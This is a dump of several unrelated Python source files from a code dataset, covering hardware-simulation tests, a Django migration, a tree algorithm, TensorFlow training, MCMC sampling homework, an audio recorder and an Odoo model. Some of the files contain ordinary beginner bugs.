if __name__ == '__main__':
avatar = movie.Movie()
print("here") |
20,764 | fb67e7f063f9885146202f43c9ac8d20e4721810 | import os
import subprocess
import matplotlib.pyplot as plt
import numpy as np
from numpy import ndarray
from pathlib import Path
from numpy.lib.type_check import iscomplex
from scipy.io import wavfile
from stringcase import titlecase, snakecase
from cocotb.binary import BinaryValue, BinaryRepresentation
from cocotb_test import simulator
test_dir = Path(__file__).parent
src_dir = test_dir.parent / 'src'
results_dir = test_dir / 'results'
class BaseTest:
_module_name = None
_title_name = None
def setup(self):
self.clean_sim_cache()
@property
def module_name(self):
if self._module_name is None:
pascal_name = self.__class__.__name__.split('Test')[1]
self._module_name = snakecase(pascal_name)
return self._module_name
@property
def title_name(self):
if self._title_name is None:
self._title_name = titlecase(self.__class__.__name__)
return self._title_name
@property
def folder_dir(self) -> Path:
# Create folder if does not exist
results_dir.mkdir(exist_ok=True)
folder_dir = results_dir / self.module_name
folder_dir.mkdir(exist_ok=True)
return folder_dir
def log(self, msg):
print(f'[{self.title_name}] {msg}')
def clean_sim_cache(self):
cache_path = test_dir / 'sim_build'
if cache_path.exists():
subprocess.check_output(
f'rm -r {cache_path}',
shell=True,
)
def list_verilog_files(self):
return [str(p.absolute()) for p in src_dir.glob('**/*.v')]
def transform_params(self, parameters):
str_params = {}
if parameters is not None:
for key, value in parameters.items():
str_params[key] = str(value)
return str_params
def run_simulator(self, name=None, parameters=None, module=None, values=None):
if name is None:
name = self.module_name
if module is None:
module = f'tests.test_{name}'
parameters = self.transform_params(parameters)
values = self.transform_params(values)
os.environ['SIM'] = 'icarus'
print(f'Testing {name} with parameters: {parameters}')
print(f'Testing {name} with values: {values}')
extra_env = {}
if parameters is not None:
for key, value in parameters.items():
extra_env[key] = value
if values is not None:
for key, value in values.items():
extra_env[key] = value
return simulator.run(
verilog_sources=self.list_verilog_files(),
toplevel=name,
module=module,
parameters=parameters,
extra_env=extra_env,
sim_build="sim_build/"
+ "_".join(("{}={}".format(*i) for i in parameters.items())),
)
class BaseSignalTest(BaseTest):
data_length = 16
def set_data(
self,
data:int,
data_length=None,
representation=BinaryRepresentation.TWOS_COMPLEMENT,
):
if data_length is not None:
self.data_length = data_length
return BinaryValue(
value=data,
n_bits=self.data_length,
bigEndian=False,
binaryRepresentation=representation,
)
def set_uns_data(self, data:int, data_length=None):
return self.set_data(
data=data,
data_length=data_length,
representation=BinaryRepresentation.UNSIGNED,
)
def quantizer(self, data, width, uns=False) -> ndarray:
if uns:
d_min = 0
d_max = 2**width - 1
gain = 2**width
else:
d_min = -2**(width-1)
d_max = 2**(width-1)-1
gain = 2**(width-1)
return np.clip(np.array(data)*gain, d_min, d_max).astype(int)
def generate_norm_sin(self, size, fc, fs=8e3):
n = np.linspace(0, size-1, size)
t = n/fs
return np.sin(2*np.pi*fc*t)
def generate_norm_complex_exp(self, size, fc, fs=8e3):
n = np.linspace(0, size-1, size)
t = n/fs
return np.exp(1j*2*np.pi*fc*t)
def generate_sin(self, size, fc, width, fs=8e3):
data_norm = self.generate_norm_sin(size, fc, fs)
return (data_norm*(2**(width-1)-1)).astype(int).tolist()
def calc_fft(self, data: ndarray, N=None, is_complex=False):
if N is None:
N = int(len(data)/2)*2
windowed_data = data * np.hanning(len(data))
result = 20*np.log10(
np.abs(
np.fft.fft(windowed_data, N)
) / N
)
if is_complex:
data = np.zeros(N)
data[:int(N/2)] = result[int(N/2):]
data[int(N/2):] = result[:int(N/2)]
return data
return result[:int(N/2)]
def show_fft(self, data: ndarray, fs=48e3, N=None, is_complex=False, show=True, name=None):
if N is None:
N = int(len(data)/2)*2
if is_complex:
f = np.linspace(-fs/2, fs/2, N)
else:
f = np.linspace(0, fs/2, int(N/2))
fft = self.calc_fft(data, N, is_complex)
plt.clf()
plt.plot(f, fft)
if show:
plt.show()
else:
plt.savefig(name)
def save_plot(self, data, name, test_name):
test_dir: Path = self.folder_dir / test_name
test_dir.mkdir(exist_ok=True)
output_file = test_dir / name
plt.clf()
if np.iscomplex(data).any():
plt.plot(data.real)
plt.plot(data.imag)
else:
plt.plot(data)
plt.savefig(output_file)
def save_wav_data(self, data:ndarray, name, test_name, fs=8000):
test_dir: Path = self.folder_dir / test_name
test_dir.mkdir(exist_ok=True)
output_file = test_dir / name
if np.iscomplex(data).any() or 'complex' in str(type(data[0])):
data = np.array([data.real, data.imag]).transpose()
wavfile.write(str(output_file), int(fs), data)
def save_data(self, data, name, test_name, fs=8000):
self.save_wav_data(data, f'{name}.wav', test_name, fs)
self.save_plot(data, f'{name}.png', test_name)
def save_fft_data(self, data, name, test_name, fs, N=None, is_complex=False):
fft = self.calc_fft(data, N, is_complex)
self.save_wav_data(fft/np.max(fft), f'{name}.wav', test_name, 8e3)
test_dir: Path = self.folder_dir / test_name
test_dir.mkdir(exist_ok=True)
output_file = test_dir / f'{name}.png'
self.show_fft(data, fs, N, is_complex, show=False, name=output_file)
def check_sin(self, data: ndarray, fc: float, fc_band=200, fs=8e3, snr=30, N=None):
if N is None:
N = len(data)
half_N = int(N/2)
windowed_data = data * np.hanning(len(data))
fft_data: ndarray = np.abs(np.fft.fft(windowed_data, N))[:half_N]
half_fs = fs/2
fc_bin = fc*half_N/half_fs
half_bw_bin = fc_band*half_N/(2*half_fs)
bw_low_bin = int(np.floor(fc_bin-half_bw_bin))
bw_high_bin = int(np.ceil(fc_bin+half_bw_bin))
self.log(f'fc BW bins: {(bw_low_bin, bw_high_bin)}')
self.log(f'fc bin: {fc_bin}')
# Check sin frequency is within the specified bounds
max_bin = fft_data.argmax()
self.log(f'max bin: {max_bin}')
self.log(f'max frequency: {max_bin/half_N*half_fs}')
assert bw_low_bin <= max_bin and max_bin <= bw_high_bin
# Check SNR
sin_data = fft_data[bw_low_bin:bw_high_bin+1]
noise_data = fft_data*1.0
noise_data[bw_low_bin:bw_high_bin+1] = 0
powered_sin = np.sum(np.power(sin_data, 2))
powered_noise = np.sum(np.power(noise_data, 2))
sin_snr = 10*np.log10(powered_sin/powered_noise)
self.log(f'Power sin: {powered_sin}')
self.log(f'Power noise: {powered_noise}')
self.log(f'Perceived SNR: {sin_snr}')
assert sin_snr > snr
def check_signal_integrity(
self,
data_in,
data_out,
freq_band,
fs,
min_db,
max_diff_db,
):
len_data = len(data_in)
min_bin, max_bin = (int(f/fs*len_data) for f in freq_band)
fft_in = self.calc_fft(data_in)[min_bin:max_bin]
fft_out = self.calc_fft(data_out)[min_bin:max_bin]
clipped_in = np.clip(fft_in, min_db, 10)
clipped_out = np.clip(fft_out, min_db, 10)
diff_abs = np.abs(clipped_out - clipped_in)
assert max(diff_abs) < max_diff_db
class BaseSdrTest(BaseSignalTest):
def interpolate(self, data: np.ndarray, rate: int, N=500):
len_data = len(data)
data_interp = np.zeros((len_data*rate))
for i in range(len_data):
if i % rate:
data_interp[i] = data[int(i/rate)]
n = np.linspace(-N/2, N/2-1, N)
filter = np.sinc(n/rate)
return np.convolve(data_interp, filter, 'same')
def decimate(self, data: np.ndarray, rate: int, N=500):
len_data = len(data)
n = np.linspace(-N/2, N/2-1, N)
filter = 2/rate*np.sinc(n/rate)*np.hanning(N)
data_out = np.convolve(data, filter, 'same')
if len_data < len(filter):
data_out = data_out[int((N-len_data)/2):int((N+len_data)/2)]
data_decim = data_out[
np.array([(i % rate)==0 for i in range(len(data_out))])
]
return data_decim
|
20,765 | 4a6684b160f49f80bb172a88bb4ea536214ad9dc | # Generated by Django 2.0.7 on 2018-07-31 09:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0003_auto_20180731_1731'),
]
operations = [
migrations.AlterField(
model_name='usertask',
name='passed_count',
field=models.IntegerField(db_index=True, default=0, verbose_name='审核通过条数'),
),
migrations.AlterField(
model_name='usertask',
name='passed_reward_count',
field=models.IntegerField(default=0, verbose_name='奖励数量'),
),
]
|
20,766 | 58d67fbfa86877f714b3bde285a4c417c9b7b3d0 | #Author guo
# -*- coding:utf-8 -*-
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
#通过遍历序列是否相同,写出两个遍历序列,比较是否相同
class Solution:
def isSymmetrical(self, pRoot):
# write code here
return self.isSymm(pRoot,pRoot)
def isSymm(self,root1,root2):
if root1==None and root2==None:
return True
if root1==None or root2==None:
return False
root1list=self.front(root1,[])
root2list=self.back(root2,[])
print(root1list)
print(root2list)
return root1list==root2list
def front(self,root,x=[]):
if root==None:
return x.append(99999)
x.append(root.val)
#print(x)
self.front(root.left,x)
self.front(root.right,x)
return x
def back(self,root,y=[]):
if root==None:
return y.append(99999)
y.append(root.val)
#print(y)
self.back(root.right,y)
self.back(root.left,y)
return y
pNode1 = TreeNode(8)
pNode2 = TreeNode(6)
pNode3 = TreeNode(10)
pNode4 = TreeNode(5)
pNode5 = TreeNode(7)
pNode6 = TreeNode(9)
pNode7 = TreeNode(11)
pNode1.left = pNode2
pNode1.right = pNode3
pNode2.left = pNode4
pNode2.right = pNode5
pNode3.left = pNode6
pNode3.right = pNode7
S = Solution()
result = S.isSymmetrical(pNode1)
print(result) |
20,767 | eedcdd3de2e267e260c93d17e9d6c888c496aff6 | '''
A logistic regression learning algorithm example using TensorFlow library.
This example is using the MNIST database of handwritten digits
(http://yann.lecun.com/exdb/mnist/)
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
'''
import pandas as pd
import numpy as np
import tensorflow as tf
def parser(serialized_example):
"""Parses a single tf.Example into image and label tensors."""
features = tf.parse_single_example(
serialized_example,
features={
'env': tf.FixedLenFeature([1, 4], tf.int64),
# 'env_segment_number': tf.FixedLenFeature([], tf.int64),
# 'env_segment_cpu': tf.FixedLenFeature([], tf.int64),
# 'env_segment_mem': tf.FixedLenFeature([], tf.int64),
# 'query_plan_ops': tf.VarLenFeature(tf.string),
# 'query_table_size': tf.VarLenFeature(tf.float32),
# 'segment_cpu_usage': tf.VarLenFeature(tf.float32),
'label': tf.FixedLenFeature([], tf.float32)
})
env = tf.cast(features['env'], tf.float32)
# image.set_shape([DEPTH * HEIGHT * WIDTH])
# # Reshape from [depth * height * width] to [depth, height, width].
# image = tf.cast(
# tf.transpose(tf.reshape(image, [DEPTH, HEIGHT, WIDTH]), [1, 2, 0]),
# tf.float32)
label = tf.cast(features['label'], tf.float32)
reshape_label = tf.reshape(features['label'], (1,1))
return env, reshape_label
EPOCHS = 10
BATCH_SIZE = 100
# Parameters
learning_rate = 0.01
training_epochs = 25
display_step = 1
# tf Graph Input
#x = tf.placeholder(tf.float32, [4, 1]) # mnist data image of shape 28*28=784
#y = tf.placeholder(tf.float32, [1, None])
# Set model weights
W = tf.Variable(tf.zeros([4, 1]))
b = tf.Variable(tf.zeros([1]))
# Gradient Descent
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
handle = tf.placeholder(tf.string, shape=[])
# Start training
with tf.Session() as sess:
#filename_queue = tf.train.string_input_producer(['./data/queries_samples/01'], num_epochs=1)
# Run the initializer
#cols = ['seg','cpu','mem','label']
#train = pd.read_csv('../data/queries_samples/01.csv',delimiter=',',names = cols)
#test = pd.read_csv('data/ua.test',delimiter='\t',names = cols)
record_defaults = [tf.float32] * 4 # Eight required float columns
dataset = tf.data.TFRecordDataset("../data/queries_samples/02").repeat()
dataset = dataset.map(parser)
#dataset = dataset.batch(BATCH_SIZE)
iter = dataset.make_one_shot_iterator()
sess.run(init)
x, y = iter.get_next()
#env, label = read_and_decode(filename_queue)
#dataset = dataset.repeat(training_epochs)
# Construct model
pred = tf.nn.softmax(tf.matmul(x, W) + b) # Softmax
# Minimize error using cross entropy
cost = tf.reduce_mean(-tf.reduce_sum(y*tf.log(pred), reduction_indices=1))
optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)
sess.run(tf.global_variables_initializer())
# Training cycle
for epoch in range(training_epochs):
#batch = dataset.batch(batch_size)
total_batch = 100
#train_iterator_handle = sess.run(iter.string_handle())
avg_cost = 0.
# Loop over all batches
for i in range(EPOCHS):
#batch_xs, batch_ys = dataset.batch(batch_size)
#next_element = iter.get_next()
# Run optimization op (backprop) and cost op (to get loss value)
sess.run([x, y])
_, c = sess.run([optimizer, cost])
print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c))
# Compute average loss
#avg_cost += c / total_batch
# Display logs per epoch step
print("Optimization Finished!")
# Test model
#correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
# Calculate accuracy
#accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
#print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
|
20,768 | fa0f06fc2d348d1430552e633c1d46808f8bcdbd | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 26 17:55:59 2017
@author: Ricardo Chávez Cáliz
"""
import numpy as np
from numpy import zeros
from numpy import log
from numpy import exp
from numpy.random import rand
from numpy.random import normal
from numpy.random import gamma
from numpy.random import exponential
from numpy.random import weibull
from numpy.random import poisson
from scipy.special import gammaln as loggamma
from matplotlib.mlab import bivariate_normal
import matplotlib.pyplot as plt
def Bernoulli(p):
"""
Función que simula una v.a distribución Bernoulli con parámetro p
Input: int
Output: int (éxito ó fracaso)
"""
M = rand(1)
if p > 1 or p<0:
raise ValueError("El parametro no es apropiado")
if M < p:
M=1
else:
M=0
return M
def vectorGauss(m,sigma):
k=len(m)
#Aplicar Cholesky
U = np.linalg.cholesky(sigma)
#Generar vector aleatorio de dimensión k con distribución N(0,1)
Z = np.zeros([k, 1], dtype=float)
for i in range(0, k):
Z[i]=np.random.normal(0,1)
#Generar vector aleatorio de dimensión 1k con ditribución N(m, sigma)
X = m + np.dot(np.transpose(U),Z)
return X
def muestraNMV(m,sigma,n):
k=len(m)
A=np.zeros((n,k))
for i in range(0, n):
X=vectorGauss(m,sigma)
for j in range(0,k):
A[i,j] = X[j,0]
return A
def grafBivariada(m,sigma):
"""
Función que grafica contornos de nivel de bivariada
"""
m1=m[0,0]
m2=m[1,0]
s1=np.sqrt(sigma[0,0])
s2=np.sqrt(sigma[1,1])
ro=(sigma[0,1])/(s1*s2)
# Devueleve eigenvalores
Eig = np.linalg.eig(sigma)
# Construir eigenvectores normalizados
V1 = np.array([Eig[1][0][0], Eig[1][1][0]])
V2 = np.array([Eig[1][0][1], Eig[1][1][1]])
# Modificar eigen valores N_{i} = alpha*raíz de lambda_{1} * V_{i}
alpha = 3
N1 = np.array([V1[0] * alpha * np.sqrt(abs(Eig[0][0])) , V1[1] * alpha * np.sqrt(abs(Eig[0][0])) ])
N2 = np.array([V2[0] * alpha * np.sqrt(abs(Eig[0][1])) , V2[1] * alpha * np.sqrt(abs(Eig[0][1])) ])
# Define los límites considerando la mayor proyección de los vectores modificados
# N1 y N2 en x y en y respectivamente.
lx = max(abs(N1[0]), abs(N2[0]))
ly = max(abs(N1[1]), abs(N2[1]))
#Da el dominio de graficación X Y usando los limites y trasladando a la media.
x = np.arange(-lx + m1, lx + m1, 0.1)
y = np.arange(-ly + m2, ly + m2, 0.1)
X, Y = np.meshgrid(x, y)
#Te da una bivariada con dominio X Y, sigma1, sigma2, mu1, mu2, pho*s1*s2 y la grafíca.
Z = bivariate_normal(X, Y, s1, s2, m1, m2, ro*s1*s2)
plt.contour(X,Y,Z, alpha=0.5)
def graficaMuestraBi(m,sigma,w1,n):
"""
Grafica una muestra normal bivriada de tamaño n con parámetros m y sigma
usando el metodo de MH con kerneles híbridos de parametro w1, junto con
los contornos de nivel de la densidad correspondiente.
Input: array, array, float, int (media, matriz de covarianza, probabiidad de
tomar el primer Kernel, tamaño)
Output: Muestra gráfica
"""
M1 = NormalMHMC(m,sigma,w1,n)
A= M1[:,0]
B= M1[:,1]
x = (A).tolist()
y = (B).tolist()
#Scatter
colors = np.arange(0, 1, 1.0/n)
area = 50*np.ones(n)
plt.scatter(x, y, s=area, c=colors, alpha=0.8)
grafBivariada(m,sigma)
plt.savefig('bivariadaMH'+str(ro)+'-'+str(n)+'.png')
plt.title('Muestra de tamano '+str(n)+ ' con rho = '+ str(ro))
plt.show()
def densidad2(a,l,T,b,c):
n=len(T)
r1=1.0
for t in T:
r1 = r1 * t
sa=0
for t in T:
sa = sa + t**a
suma=0
for t in T:
suma = suma + log(t)
return ((n+a-1)*log(l)) - (l*(b+sa)) + (log(b)*a ) + (log(a)*n) + (a-1)*suma - (c*a) - loggamma(a)
def grafTiempos(M,T,b,c):
"""
Función que grafica bivariada
"""
A=min(0.1, min(M[:,0]))
B=max(M[:,0])
C=min(0.1, min(M[:,1]))
D=max(M[:,1])
#Contornos
delta = 0.25
x = np.arange(A, B+ 2*delta, delta)
y = np.arange(C, D+ 2*delta, delta)
X, Y = np.meshgrid(x, y)
Z = densidad2(X,Y,T,b,c)
ma= np.amax(Z)
mi= np.amin(Z)
plt.figure()
plt.contour(X, Y, Z, levels=np.arange(mi,ma,5))
def NormalMHMC(m,sigma,w1,tam):
"""
Aplica el algoritmo de Metropolis-Hastings considerando como funcion
objetivo la distribución normal bivariada con Kerneles híbridos dados
por las siguientes propuestas:
q1 ((x01, x02)|(x1, x2)) = f_X1|X2(x01|x2)1(x02 = x2)
q2 ((x01, x02)|(x1, x2)) = fX2|X1(x02|x1)1(x01 = x1)
Input: media, matriz de covarianza, tamaño (array, array, int)
Output: muestra (array)
"""
dim = 2
M = zeros((tam, dim))
m1=m[0,0]
m2=m[1,0]
s1=np.sqrt(sigma[0,0])
s2=np.sqrt(sigma[1,1])
ro=(sigma[0,1])/(s1*s2)
#Inical.
M[0,0] = m1
M[0,1] = m2
for i in range(1,tam):
if Bernoulli(w1)==1:
x2=M[i-1,1]
M[i,0]=normal(m1+ro*s1*(x2-m2)/s2, (s1**2)*(1-ro**2))
M[i,1]=M[i-1,1]
else:
x1=M[i-1,0]
M[i,1]=normal(m2+ro*s2*(x1-m1)/s1, (s2**2)*(1-ro**2))
M[i,0]=M[i-1,0]
return M
def propuesta(numP,a,l,b,c,sigma,T):
"""
Devuelve distintas propuestas de acuerdo a la opción selecccionada.
Input: int (opción deseada)
Output: float, float (propuesta, ro)
"""
n=len(T)
if numP>4 or numP<1:
raise ValueError("No conozco esa propuesta")
if numP==1:
sa=0
for t in T:
sa = sa + t**a
#propuestas
lp= gamma(a + n , 1.0/(b + sa))
ap= a
#rho
ro = 1
return ap,lp,ro
elif numP==2:
r1=1.0
for t in T:
r1 = r1 * t
#propuestas
ap = gamma(n + 1 , 1.0/(-log(b)-log(r1)+c))
lp = l
#rho
sap=0
for t in T:
sap = sap + t**ap
sa=0
for t in T:
sa = sa + t**a
aux = float(loggamma(a)) + (ap-a)*l - l*sap-float(loggamma(ap)) + l*sa
c=min(0,aux)
return ap,lp,exp(c)
elif numP==3:
ap = exponential(c)
lp = gamma(ap , 1.0/b)
#rho
sap=0.0
for t in T:
sap = sap + t**ap
sa=0.0
for t in T:
sa = sa + t**a
r1=1.0
for t in T:
r1= r1*t
aux = n*log((ap*lp)/(a*l)) + (ap-a)*log(r1)- lp*sap + l*sa
c=min(0,aux)
return ap,lp,exp(c)
else:
ap=a + normal(0,sigma)
lp= l
suma=0
for t in T:
suma = suma + log(t)
sap=0
for t in T:
sap = sap + t**ap
sa=0
for t in T:
sa = sa + t**a
aux = ap*log(l)-l*(b+sap)+ap*log(b)+n*log(ap)+(ap-1)*suma-c*ap-float(loggamma(ap))-a*log(l)+l*(b+sa)-a*log(b)-n*log(a)-(a-1)*suma+c*a+float(loggamma(a))
c=min(0,aux)
return ap,lp,exp(c)
def TiemposMHMC(c,b,sigma,tam,T):
"""
Aplica el algoritmo MH usando Kerneles híbridos para simular valores de
la distribución posterior f(α, λ|t ̄) ∝ f(t ̄|α, λ)f(α, λ), considerando
las siguientes propuestas:
Propuesta 1:
λp|α,t ̄∼ Gamaα + n , b +Xni=1tαi!
Propuesta 2:
αp|λ,t ̄ ∼ Gama (n + 1 , −log(b) − log(r1) + c)
Propuesta 3:
αp ∼ exp(c) y λp|αp ∼ Gama(αp, b)
Propuesta 4 (RWMH):
αp = α + , con ∼ N(0, σ) y dejando λ fijo.
con distribuciones a priori datos simulado usando α = 1 y λ = 1 con n = 20
c = 1 y b = 1.
Input:
Output: muestra (array)
"""
dim = 2
M = zeros((tam, dim))
ef=0.0
#Inical.
M[0,0] = exponential(1)
M[0,1] = gamma(M[0,0], 1)
for i in range(1,tam):
a=M[i-1][0]
l=M[i-1][1]
numP = int(4*rand(1)[0])+1
R = propuesta(numP,a,l,b,c,sigma,T)
ap = R[0]
lp = R[1]
ro = R[2]
if Bernoulli(ro) == 1.0:
M[i,0] = ap
M[i,1] = lp
else:
M[i,0] = M[i-1,0]
M[i,1] = M[i-1,1]
ef=ef+1
print ("Se rechazaron el "+ str(ef*100.0/tam)+ "% de las propuestas")
return M
def bombasAguaMHMC(a,c,d,tam,w1):
"""
Simula valores de la distribución posterior f(λ1, . . . , λn, β|p ̄), usando
un kernel híbrido que considera las propuestas:
λi ̄∼ Gama(t_ip_i + α , β + 1)
β ∼ Gama(nα + γ , δ + Sum(λ)
Con parámetros a priori dados
Input: a (float), c(float), d (float), tam(int), w1(float)
Output: array(tam x 11) (muestra)
"""
D = np.array([[94.32, 5],[15.72, 1],[62.88, 5],[125.76, 14],[5.24, 3],
[31.44, 19],[1.05, 1],[1.05, 1],[2.1, 4],[10.48, 22]])
n=len(D)
dim = n+1
M = zeros((tam, dim))
#Inical.
M[0,n] = gamma(c, 1.0/(d)) #Beta a priori
M[0,0:n] = gamma(a,1.0/(M[0,n]),n) #Lambdas a priori
for i in range(1,tam):
b= M[i-1,n]
L=M[i-1,0:n]
if Bernoulli(w1) == 1.0:
#deja betas
M[i,n]=b
#Mueve lambdas
for j in range(0,n):
#M[i,j]= gamma(D[j,0]*D[j,1] + a, 1.0/(b+1) )
M[i,j]= gamma(D[j,1] + a, 1.0/(b+D[j,0]) )
else:
#Mueve beta
M[i,n]=gamma(n*a + c,1.0/(d+sum(L)))
#Deja lambdas
M[i,0:n] = L
return M
def graficaColumnas(M):
"""
Simula valores de la distribución posterior f(λ1, . . . , λn, β|p ̄), usando
un kernel híbrido que considera las propuestas:
λi ̄∼ Gama(t_ip_i + α , β + 1)
β ∼ Gama(nα + γ , δ + Sum(λ)
Con parámetros a priori dados
Input: a (float), c(float), d (float), tam(int), w1(float)
Output: array(tam x 11) (muestra)
"""
r=4
c=3
f, axarr = plt.subplots(r, c,figsize=(8, 6), dpi=80)
C=np.ones(len(M))
for j in range(0,9):
p= np.mean(M[10:,j])
axarr[j/c, j%c].plot(M[10:,j],'o',markersize=2.5,alpha=0.3,color='#009999')
axarr[j/c, j%c].plot(C*p,linewidth=3,color='#990033')
axarr[j/c, j%c].set_title('lambda'+str(j+1))
axarr[j/c, j%c].set_xticklabels([])
print ("El promedio de lambda"+str(j+1)+" es " + str(p))
p= np.mean(M[10:,9])
axarr[3, 1].plot(M[10:,9],'o',markersize=2.5,alpha=0.3,color='#009999')
axarr[3, 1].plot(C*np.mean(M[10:,9]),linewidth=3,color='#990033')
axarr[3, 1].set_title('lambda10')
print ("El promedio de lamda10 es " + str(p))
#Bonito
f.subplots_adjust(hspace=0.4)
for t in [0,2]:
axarr[3,t].spines['bottom'].set_color('white')
axarr[3,t].spines['left'].set_color('white')
axarr[3,t].spines['top'].set_color('white')
axarr[3,t].spines['right'].set_color('white')
for s in axarr[3,t].xaxis.get_ticklines(): s.set_color('white')
for s in axarr[3,t].yaxis.get_ticklines(): s.set_color('white')
plt.setp([axarr[3,t].get_yticklabels()], visible=False)
for j in range(0,r):
plt.setp([a.get_xticklabels() for a in axarr[j, :]], visible=False)
plt.savefig('lambdas.png')
plt.show()
def evalua(M):
n=len(M)
x = np.arange(0., n, 1)
y = log(M)
colors = np.arange(0, 1, 1.0/n)
area = 30*np.ones(n)
plt.scatter(x, y, s=area, c=colors, alpha=0.8)
plt.show()
if __name__ == "__main__":
"""
1. Aplique el algoritmo de Metropolis-Hastings considerando como funcion
objetivo la distribución normal bivariada:
Considere las siguientes propuestas:
q1 ((x01, x02)|(x1, x2)) = f_X1|X2(x01|x2)1(x02 = x2)
q2 ((x01, x02)|(x1, x2)) = fX2|X1(x02|x1)1(x01 = x1)
A partir del algoritmo MH usando Kerneles híbridos simule valores de
la distribución normal bivariada, fijando σ1 = σ2 = 1, considere los
casos ρ = 0.8 y ρ = 0.99.
"""
for n in [1000,10000]:
m = np.array([[0],
[0]])
w1=0.5
#CASO 0.8
ro = 0.8
sigma = np.array([[1, ro],
[ro, 1]])
graficaMuestraBi(m,sigma,w1,n)
#CASO 0.99
ro = 0.99
sigma = np.array([[1, ro],
[ro, 1]])
graficaMuestraBi(m,sigma,w1,n)
"""
2. Considere los tiempos de falla t1, . . . tn con distribución Weibull(α, λ):
f(t|α, λ) = αλt^(α−1)e^(−tαiλ)
Se asumen como a priori α ∼ exp(c) y λ|α ∼ Gama(α, b), por lo tanto,
f(α, λ) = f(λ|α)f(α). Así, para la disitribución posterior se tiene:
f(α, λ|t ̄) ∝ f(t ̄|α, λ)f(α, λ)
A partir del algoritmo MH usando Kerneles híbridos simule valores de
la distribución posterior f(α, λ|t ̄), considerando las siguientes propues-
tas:
Propuesta 1:
λp|α,t ̄∼ Gamaα + n , b +Xni=1tαi! y dejando α fijo.
Propuesta 2:
αp|λ,t ̄ ∼ Gama (n + 1 , −log(b) − log(r1) + c) , y dejando λ fijo.
Propuesta 3:
αp ∼ exp(c) y λp|αp ∼ Gama(αp, b).
Propuesta 4 (RWMH):
αp = α + , con ∼ N(0, σ) y dejando λ fijo.
Simular datos usando α = 1 y λ = 1 con n = 20. Para la a priori usar
c = 1 y b = 1.
"""
n=1000
T = weibull(1,20)
M = TiemposMHMC(1,1,0.1,n,T)
grafTiempos(M,T,1,1)
A= M[:,0]
B= M[:,1]
x = (A).tolist()
y = (B).tolist()
#Scatter
colors = np.arange(0, 1, 1.0/n)
area = 50*np.ones(n)
plt.scatter(x, y, s=area, c=colors, alpha=0.5)
plt.savefig('tiemposMH'+str(n)+'.png')
plt.title('Muestra de tamano '+str(n))
plt.show()
"""
3. Considere el ejemplo referente al n ́umero de fallas de bombas de agua
en una central nuclear, donde pi representa el n ́umero de fallas en el
tiempo de operaci ́on ti, con i = 1, . . . n.
Se considera el modelo pi ∼ P oisson(λiti), (las λi son independien-
tes entre si), con distribuciones a priori λi|β ∼ Gama(α, β) y β ∼Gama(γ, δ),
por lo tanto:
f(λ1, . . . , λn, β) = f(λ1|β)f(λ2|β). . . f(λn|β)f(β)
Para la distribución posterior se tiene:
f(λ1, . . . , λn, β|p ̄) ∝ L( ̄p, λ, β ̄ )f(λ1, . . . , λn, β)
Simule valores de la distribuci ́on posterior f(λ1, . . . , λn, β|p ̄), usando
un kernel h ́ıbrido, considerando las propuestas:
λi|λ ̄−i, β,t ̄ ∼ Gama(tipi + α , β + 1)β|λ, ̄ t ̄ ∼ Gama
nα + γ , δ +Xni=1λi!
Verifique que estas son propuestas Gibbs.
Use los datos del Cuadro 1 con los parámetros a priori α = 1.8, γ = 0.01
y δ = 1.
"""
tam=1000
a=1.8
c=0.01
d=1
w1=0.5
M = bombasAguaMHMC(a,c,d,tam,w1)
graficaColumnas(M)
C=np.ones(len(M))
plt.figure(num=None, figsize=(3, 3), dpi=80)
plt.plot(M[10:,10],'o',markersize=5,alpha=0.3,color='#ffcc00')
p = np.mean(M[10:,10])
plt.plot(C*p,linewidth=3,color='#990033')
plt.title('Betas simuladas con Gibs sampler')
plt.savefig('betas.png')
plt.show()
print ("El promedio de beta es " + str(p))
lambdas= np.zeros(11)
for j in range(0,11):
lambdas[j]=np.mean(M[10:,j])
for j in range(0,10):
print (np.mean(poisson(lambdas[j]*D[j,1],1000))) |
20,769 | daba5b69d1a3bf3dbbfda53fe1b34b4349cea37f | import sounddevice as sd
import soundfile as sf
import queue
import datetime;
import sys
import os
q = queue.Queue()
def callback(indata, frames, time, status):
"""This is called (from a separate thread) for each audio block."""
if status:
print(status)
q.put(indata.copy())
fileName= datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filePath='./audios/wav/' + fileName + '.wav'
mode='x'
channels=1
device=int(sys.argv[1])
device_info = sd.query_devices(device, 'input')
samplerate = int(device_info['default_samplerate'])
try:
with sf.SoundFile(filePath, mode=mode, samplerate=samplerate, channels=channels) as file:
with sd.InputStream(samplerate=samplerate, device=device, channels=channels, callback=callback):
print('{"name": "' + fileName + '"}')
sys.stdout.flush()
while True:
file.write(q.get())
except KeyboardInterrupt:
print('\nRecording finished: ' + filePath)
sys.stdout.flush()
exit()
except Exception as e:
print(e)
sys.stdout.flush()
exit() |
20,770 | cf7611195ed56c0ee7fb57577642e58dd6b970c8 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
from datetime import datetime
class Mes(models.Model):
_name = 'gastos_mes.mes'
mes = fields.Char(string='mes', required=True)
anio = fields.Integer(string='anio', required=True)
def get_mes(self):
mes = []
for c in self:
mes = c.mes + ' - ' + c.anio
mes.append((c.id, mes))
return mes
|
20,771 | e1f24a0c57287914636702bb80b8537229bbf55e |
import pandas as pd
import numpy as np
MAX_DIAGNOSIS_AGE = 5
l_id = [0, 2, 3, 4, 4, 9]
l_reg = [1 , 1, 5, 3, 2, 0]
df = pd.DataFrame({'id': l_id, 'reg' : l_reg})
l_id = [0, 2, 5, 4, 9]
l_reg = [3, 2, 4, 2, 11]
l_value = [9, 134, 12, 2, 17]
df_x = pd.DataFrame({'id': l_id, 'reg': l_reg, 'd' : l_value})
reg_max = np.max([df_x.reg.max(), df.reg.max()])
reg_offset = reg_max + 1
df_x = df_x.assign(idx = df_x.reg + reg_offset * df_x.id)
